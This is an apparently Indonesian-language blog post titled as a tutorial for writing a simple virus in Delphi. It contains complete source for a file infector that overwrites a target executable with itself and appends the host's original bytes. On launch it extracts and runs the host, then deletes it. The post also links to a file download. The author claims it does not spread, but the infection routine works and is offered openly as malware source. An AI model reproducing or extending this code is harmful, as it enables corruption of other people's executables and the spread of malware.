Membuat Program Virus Sederhana Menggunakan Delphi


this is simple code virus, it's doesn't spread to anything,
just to show how virus infected function

//thx to aphex, p0ke and hackhound.org
program morissa;//code by xenion

uses windows,shellapi,findwin,pfunc;

Function GenerateName: String;
Begin
  Randomize;
  Result := '';
  While Length(Result) < 10 do
    Result := Result + IntToStr(Random(10));
  Result := Result+'.exe';
End;

Procedure InfectFile(Name: String);
Var
  FileBuffer, Settings: String;
  F: TextFile;
Begin
{
  infected file position
  | VIRUS BYTE   |
  ---------------
  | HOST BYTE    |
  ---------------
  | SETTING CODE |
}
  If Name = ParamStr(0) Then Exit;

  FileBuffer := '';
  ReadFileStr(Name, FileBuffer); //copy target file as string to filebuffer
  If FileBuffer = '' Then Exit;

  If Pos('testing_infect', FileBuffer) > 0 Then Exit;
  If Not CopyFile(pChar(ParamStr(0)), pChar(Name), False) Then Exit; //overwrite file

  Settings :=#00 + GenerateName + #02 + IntToStr(Length(FileBuffer)) + #01;

  AssignFile(F, Name);
  Append(F);
  Write(F, FileBuffer);
  Write(F, Settings);
  CloseFile(F);
End;

Procedure ReleaseIt;
Var
  FContent, Settings, FName, FHost, PName: String;
  I, FSize: Integer;
  F: TextFile;
  Deleted:boolean;
Begin
  PName := GenerateName;
  If Not CopyFile(pChar(ParamStr(0)), pChar(PName), False) Then Exit;
  ReadFileStr(PName, FContent);

  I := Length(FContent);
  Settings := '';

  {
   read file (char by char) from eof to begin,
   search for char #00, if exist that mean this host file
   already bindered with virus byte,
   so we have to drop it, and execute
  }
  While (I > 0) And (FContent[i] <> #00) Do
  Begin
    Settings := FContent[i] + Settings;
    Dec(I);
  End;

  //if char #00 not exist it mean this host file are virus byte (not bindered with any other file), so delete it
  If Settings = '' Then
  Begin
    DeleteFile(pChar(PName));
    Exit;
  End;

  {
    delete Settings from fContent
    before delete

      | VIRUS BYTE   |
      ---------------
      | HOST BYTE    |
      ---------------
      | SETTING CODE |

    after delete

      | VIRUS BYTE   |
      ---------------
      | HOST BYTE    |
  }
  Delete(FContent, I, Length(Settings));

    //extract file name |1231202.exe|[#02]200001[#01]
    FName := Copy(Settings, 1, Pos(#02, Settings)-1);
    //delete file name from variable Settings so it looks like this "200001[#01]"
    Delete(Settings, 1, Pos(#02, Settings));

    //extract file size |200001|[#01]
    FSize := StrToInt(Copy(Settings, 1, Pos(#01, Settings)-1));
    //delete file size from variable Settings, so variable settings becoming empty ""
    Delete(Settings, 1, Pos(#01, Settings));

    //get Host Byte and put in FHost
    FHost:=Copy(FContent, Length(FContent)-FSize, FSize);

    //create file based on Host Byte
    Try
      AssignFile(F, FName);
      ReWrite(F);
      Write(F,FHost);
      CloseFile(F);
    Except
      Exit;
    End;
    //execute host byte
    WinExec(PChar(FName),SW_SHOWNORMAL);
    DeleteFile(pChar(PName));
    //loop until file host succesfully deleted
    Deleted:=false;
    repeat
      Deleted:=DeleteFile(PChar(FName));
    until Deleted;
End;

//main
var myDirList:TStrList;
begin
  ReleaseIt;
  InfectFile('someExeFile.exe');
end.

http://www.mediafire.com/download.php?ttilmamqd1o

One response to “Membuat Program Virus Sederhana Menggunakan Delphi

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s